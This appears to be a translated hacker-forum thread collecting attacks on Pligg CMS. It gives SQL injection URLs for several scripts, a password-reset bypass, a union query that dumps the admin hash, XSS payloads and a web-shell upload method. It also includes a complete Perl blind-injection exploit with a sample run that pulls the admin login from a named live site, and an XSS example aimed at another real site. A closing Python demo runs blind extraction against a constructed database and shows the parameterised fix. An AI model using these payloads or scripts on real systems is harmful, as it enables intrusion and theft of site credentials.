Product: Pligg Content Management System Beta 9.8 09.08.2007
Homepage: http://www.pligg.com
Dork: Powered By Pligg

Blind SQL-injection
magic_quotes = off
/out.php
PHP:
------------------------
...
$requestID = $_REQUEST['id'];
$requestTitle = $_REQUEST['title'];
$requestURL = $_REQUEST['url'];
if(isset($requestTitle)){
    $requestID = $db->get_var("SELECT link_id FROM " . table_links . " WHERE `link_title_url` = '$requestTitle';");
}
if(isset($requestURL)){
    $requestID = $db->get_var("SELECT link_id FROM " . table_links . " WHERE `link_url` = '$requestURL';");
}
if(is_numeric($requestID)) {
...
------------------------
exploit:
http://pligg/out.php?title=' union select if(true,1,null) -- -
http://pligg/out.php?title=' union select if(false,1,null) -- -
exploit:
http://pligg/out.php?url=' union select if(true,1,null) -- -
http://pligg/out.php?url=' union select if(false,1,null) -- -

Blind SQL-injection
register_globals = on
/userrss.php
PHP:
------------------------
...
if(isset($_REQUEST['user'])){$login = $_REQUEST['user'];}
$user=new User();
$user->username = $login;
if(!$user->read()) {
    echo "error: user does not exist";
    die;
}
...
if(!empty($_REQUEST['rows'])) $rows = $_REQUEST['rows'];
else $rows = 40;
...
if(!empty($_REQUEST['status'])) {
    $status = $_REQUEST['status'];
} else {
    // By default it searches on all
    if($search) $status = 'all';
    else $status = 'all';
}
switch ($status) {
    case 'published':
        $order_field = 'link_published_date';
        $link_date = 'published_date';
        $title = $main_smarty->get_config_vars("PLIGG_Visual_Published_News");
        $from_where = "FROM " . table_links . " WHERE link_status='published' ";
        break;
    case 'queued':
        ...
    case ...
    case ...
}
$from_where .= " AND link_author=$user->id "; // this is where a piece of SQL can be appended
$order_by = " ORDER BY $order_field DESC ";
$last_modified = $db->get_var("SELECT UNIX_TIMESTAMP(max($order_field)) links $from_where");
$sql = "SELECT DISTINCT link_id $from_where $order_by LIMIT $rows";
------------------------
exploit:
http://pligg/userrss.php?user=god&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and true -- -
http://pligg/userrss.php?user=god&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and false -- -

Blind SQL-injection
magic_quotes_gpc = off
/login.php
PHP:
------------------------
...
if($_POST["processlogin"] == 3) { // if user requests forgotten password
    $username = trim($_POST['username']);
    if(strlen($username) == 0){
        $errorMsg = $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error");
    } else {
        $user = $db->get_row("SELECT * FROM `" . table_users . "` where `user_login` = '".$username."'");
        if($user){
            $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
...
------------------------
exploit:
POST: http://pligg/login.php?processlogin=3&username=root' or false -- -
POST: http://pligg/login.php?processlogin=3&username=root' or true -- -
if file_priv=Y:
/login.php?processlogin=3&username=root' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 into outfile '/path/pligg.txt' -- -

Blind SQL-injection
magic_quotes = off
/story.php
PHP:
-------------------------
...
if(isset($_REQUEST['title'])){$requestTitle = strip_tags($_REQUEST['title']);}
...
if(isset($requestTitle)){
    $tmp = "SELECT link_id FROM " . table_links . " WHERE `link_title_url` = '$requestTitle';";
    $requestID = $db->get_var($tmp);
}
...
-------------------------
exploit:
http://pligg/story.php?title=[existing title]' and (substring(version(),1,1))>1-- -

Blind SQL-injection
/editlink.php
PHP:
-------------------------
...
if(isset($_GET['id'])){ $theid = strip_tags($_GET['id']); }
if(isset($_POST['id'])){ $theid = strip_tags($_POST['id']); }
...
$link = $db->get_row("SELECT link_id, link_author FROM " . table_links . " WHERE link_id=".$theid.";");
if ($link) {
    if ($link->link_author==$current_user->user_id || $current_user->user_level == "admin" || $current_user->user_level == "god") {
...
-------------------------
exploit:
http://pligg/editlink.php?id=-1 union select 1,if(true,'god',1)-- -
http://pligg/editlink.php?id=-1 union select 1,if(false,'god',1)-- -
if file_priv=Y:
http://pligg/editlink.php?id=-1 union select 1,2 into outfile 'c:/pligg.txt'-- -

(c) AFoST
AFoST, in version 1.0.0 none of the blinds work) i.e. the developers added an "anti-hack" function sanitize(, and the code now looks like this:
PHP:
$requestID = sanitize($_REQUEST['id'], 3);
$requestTitle = sanitize($_REQUEST['title'], 3);
$requestURL = sanitize($_REQUEST['url'], 3);

Pligg 1.0.0 pXSS
/register_complete.php
PHP:
$user=$_GET['user'];
$usr = new User();
$usr->username = $user;
if ($usr->read()){
    $email = $usr->email;
}
exploit:
Code:
/register_complete.php?user=a<script>alert(/xss/);</script>
example:
Code:
http://www.gossipsnipper.com/register_complete.php?user=a<script>alert(/xss/);</script>

Full path disclosure
Code:
/install/header.php
/install/install0.php
/install/troubleshooter.php
/install/install1.php
/install/menu.php
/libs/backup/mysql_backup/backup.php
/libs/backup/mysql_backup/init.php

Full path disclosure
/Config_File.class.php
/Smarty_Compiler.class.php
/Smarty_Test.class.php
/class.compiler.php
/podcast.php
/settings.php

Directory listing (if .htaccess allows it)
http://pligg/cache/
http://pligg/internal/
http://pligg/evb/
http://pligg/libs/
http://pligg/modules/
http://pligg/plugins/
http://pligg/templates/
http://pligg/templates_c/
It was there in that version too) just not everywhere =) This engine is where that lovely bit of "code" for changing the admin password lives)) Just needs finishing off...
User password reset to "password"
Thanks to Gifts for the help
PHP:
if($_GET["processlogin"] == 4) { // if user clicks on the forgotten password confirmation code
    $username = trim($_GET['username']);
    if(strlen($username) == 0){
        $errorMsg = $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error");
    } else {
        $confirmationcode = $_GET["confirmationcode"];
        $DBconf = $db->get_var("SELECT `last_reset_code` FROM `" . table_users . "` where `user_login` = '".$username."'");
        if($DBconf){
            if($DBconf == $confirmationcode && !empty($confirmationcode)){
                $db->query('UPDATE `' . table_users . '` SET `last_reset_code` = "" WHERE `user_login` = "'.$username.'"');
                $db->query('UPDATE `' . table_users . '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login` = "'.$username.'"');
                $errorMsg = $main_smarty->get_config_vars('PLIGG_Visual_Login_Forgot_PassReset');
exploit:
/login.php?processlogin=4&username=" or user_login = "god" /*' and 1=0 UNION select 123/*&confirmationcode=123
Version: 1.0.1 (possibly earlier versions too)
Default table prefix: pligg_
SQL Injection
Vuln file: /libs/search.php
There is quite a lot of code, so I won't paste it.
Exploit:
Code:
http://[host]/[path]/search.php?search=paxek&slink=1&scategory=1)+union+select+(select+concat(0x3c62723e,user_login,0x3a,user_pass,0x3c62723e)+from+[prefix]users+where+user_id=1),null,null--+&adv=1

Version: 1.0.3 (the latest at the moment)
Blind SQL Injection
Vuln file: /libs/search.php
Exploit:
Code:
http://[host]/[path]/search.php?search=[search_keywords]&slink=1&scategory=1[inj]&adv=1
I couldn't get output like in version 1.0.1, because the config has "error_reporting(E_ERROR)" by default, so we work it as a blind. I wrote an exploit for this.
Code:
#!/usr/bin/perl
# Pligg CMS 1.0.3 blind SQL injection exploit (libs/search.php, scategory parameter).
# Found && coded by RulleR, Antichat.ru
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
use Fcntl;

my $title = <<'BANNER';

 [*]=====================================[*]
 !                                       !
 ! Pligg CMS Blind SQL Injection Exploit !
 !                                       !
 !       Found && coded by RulleR        !
 !             Antichat.ru               !
 !                                       !
 [*]=====================================[*]

BANNER
print $title;

print "\n[+] Enter Host: ";
chomp(my $host = <STDIN>);
print "\n[+] Enter Search Keywords: ";
chomp(my $searchkey = <STDIN>);
print "\n[+] Enter \"scategory\": ";
chomp(my $scat = <STDIN>);
print "\n[>] Exploiting started... $host\n\n";
print " Please wait...\n\n";

#________________ CONFIG _______________
my $regexp   = '<a href=.*>' . $searchkey;  # a result link in the page => injected condition was true
my $length   = 100;                          # maximum number of characters to extract
my $column   = 'user_login';                 # concat_ws(0x3a,user_login,user_pass) to grab the hash as well
my $prefix   = 'pligg_';
my $table    = 'users';
my $user_id  = 1;
my $filename = 'Pligg_exp_result.txt';
#_______________________________________

my @res;
XEK: for (my $start = 1; $start <= $length; $start++) {
    # binary search for ord(substr(value, $start, 1)) in the range [0, 255]
    my ($min, $max) = (0, 255);
    while (1) {
        my $x = int(($max - $min) / 2 + $min);
        if (WebGet($host, $start, $x) =~ /$regexp/) {
            $min = $x;
        } else {
            $max = $x;
        }
        last XEK if ($max == 1);   # ord() never exceeded 1: end of the string
        if ($max - $min == 1) {
            push @res, chr($max);
            print @res, "\n";
            last;
        }
    }
}

print "\n[!] Exploiting finished :)\n\n";
print "---------------------- [Result] ----------------------\n";
print @res, "\n";
print "------------------------------------------------------\n";

sysopen(my $result, $filename, O_WRONLY | O_CREAT | O_TRUNC) or die "Cannot open $filename: $!\n";
print $result $title;
print $result "\n---------------------- [Result] ----------------------\n";
print $result @res;
print $result "\n------------------------------------------------------\n";
close($result);
print "\nResult saved in $filename\n";

# One request: appends " and ord(substr((select <column> ...), <pos>, 1)) > <val>" to scategory
sub WebGet {
    my ($target, $pos, $val) = @_;
    my $inj = '/search.php?search=' . $searchkey . '&slink=1&scategory=' . $scat
            . '+and+ord(substr((select+' . $column . '+from+' . $prefix . $table
            . '+where+user_id=' . $user_id . '),' . $pos . ',1))>' . $val . '&adv=1';
    my $request = HTTP::Request->new(GET => $target . $inj);
    my $u_a = LWP::UserAgent->new();
    $u_a->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    $u_a->timeout(10);
    my $response = $u_a->request($request);
    if ($response->is_error) {
        print " ! Error: " . $response->status_line . ".\n";
        die " :(\n";
    }
    return $response->content;
}
or grab it from pastebin.com
Example run (retrieving the admin's login):
Code:
D:\\$_W3b-x3q\cms_all>pligg_exp.pl

 [*]=====================================[*]
 !                                       !
 ! Pligg CMS Blind SQL Injection Exploit !
 !                                       !
 !       Found && coded by RulleR        !
 !                                       !
 [*]=====================================[*]

[+] Enter Host: http://doanhnhanso.com/news

[+] Enter Search Keywords: Online

[+] Enter "scategory": 6

[>] Exploiting started... http://doanhnhanso.com/news

 Please wait...

d
do
doa
doan
doanh
doanhn
doanhnh
doanhnha
doanhnhan
doanhnhans
doanhnhanso

[!] Exploiting finished :)

---------------------- [Result] ----------------------
doanhnhanso
------------------------------------------------------

Result saved in Pligg_exp_result.txt

Passive XSS
Exploit:
Code:
http://[host]/[path]/search.php?search=</title><script>alert(1)</script>
http://[host]/[path]/search.php?"><script>alert(1)</script>
------------------------------------------------------------
Need: register_globals = ON
http://[host]/[path]/advancedsearch.php?category_option=<script>alert(1)</script>

Upload shell
Need: admin account
Admin --> Modules
Install the Upload module (not installed by default) and enable it (click Disable). Then go to Settings --> General Settings and add the php extension to Allowed File Type. Add a story and attach the shell.
The shell will be at /modules/upload/attachments/[name_shell].php
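The boolean oracle that the true/false request pairs in the first post (out.php, userrss.php) and RulleR's Perl script both rely on, written out as an added example. This is not Pligg's code and not code from this thread: the search endpoint, the table layout and the rows are constructed here, backed by in-memory SQLite rather than MySQL, so SQLite's unicode(substr()) stands in for MySQL's ord(substr()). The endpoint concatenates the scategory parameter into its query the way the posts describe, the extractor binary-searches each byte through the "did the results page contain a hit?" oracle, and a parameterised variant of the same query is included to show the injected value becoming an ordinary comparison operand.

```python
"""Boolean-based blind SQL injection extraction against a constructed target.

Added example; none of this is Pligg's code or the thread's exploit.  The
table names, the single admin row and the single story are sample data.
"""
import sqlite3


def build_db():
    """Constructed sample database: default 'pligg_' prefix, one admin, one story."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pligg_users (user_id INTEGER, user_login TEXT, user_pass TEXT)")
    conn.execute("CREATE TABLE pligg_links (link_id INTEGER, link_title TEXT, link_category INTEGER)")
    conn.execute("INSERT INTO pligg_users VALUES (1, 'god', 'constructed-hash')")
    conn.execute("INSERT INTO pligg_links VALUES (1, 'Online news', 6)")
    conn.commit()
    return conn


def vulnerable_search(conn, search, scategory):
    """Models the injectable query: scategory is pasted into the SQL text unquoted."""
    sql = ("SELECT link_title FROM pligg_links WHERE link_title LIKE '%" + search + "%'"
           " AND link_category=" + scategory)
    return conn.execute(sql).fetchall()


def safe_search(conn, search, scategory):
    """Hardened form: bound parameters, so scategory is a value and never SQL."""
    sql = "SELECT link_title FROM pligg_links WHERE link_title LIKE ? AND link_category=?"
    return conn.execute(sql, ("%" + search + "%", scategory)).fetchall()


def oracle(conn, search, scategory, condition):
    """True iff the page would still show a hit after appending ' and (<condition>)'."""
    rows = vulnerable_search(conn, search, scategory + " and (" + condition + ")")
    return len(rows) > 0


def extract_blind(conn, search, scategory, subquery, max_len=100):
    """Binary-search each byte of the subquery's result (about 8 requests per character).

    Returns (extracted_string, number_of_oracle_queries).  unicode(substr()) is
    the SQLite spelling of MySQL's ord(substr()); past the end of the string
    substr() yields '' and unicode('') is NULL, so every comparison is false.
    """
    out, queries = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255               # invariant: lo < byte <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            cond = "unicode(substr((%s),%d,1))>%d" % (subquery, pos, mid)
            queries += 1
            if oracle(conn, search, scategory, cond):
                lo = mid
            else:
                hi = mid
        if hi == 1:                   # nothing above 1: end of the string
            break
        out += chr(hi)
    return out, queries


if __name__ == "__main__":
    db = build_db()
    value, n = extract_blind(db, "Online", "6",
                             "select user_login from pligg_users where user_id=1")
    print("extracted %r in %d oracle queries" % (value, n))
    print("same payload against the parameterised query:",
          safe_search(db, "Online", "6 and (1=1)"))
```

Each character costs at most eight requests because the search halves the 0-255 range every time; a linear scan would cost up to 255. The parameterised query returns nothing for the injected scategory because the whole string is compared against the integer column as one value, which is the fix the thread's sanitize() note only approximates.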
RulleR, even when there is no error-based output, exploits should still use binary search, at the very least.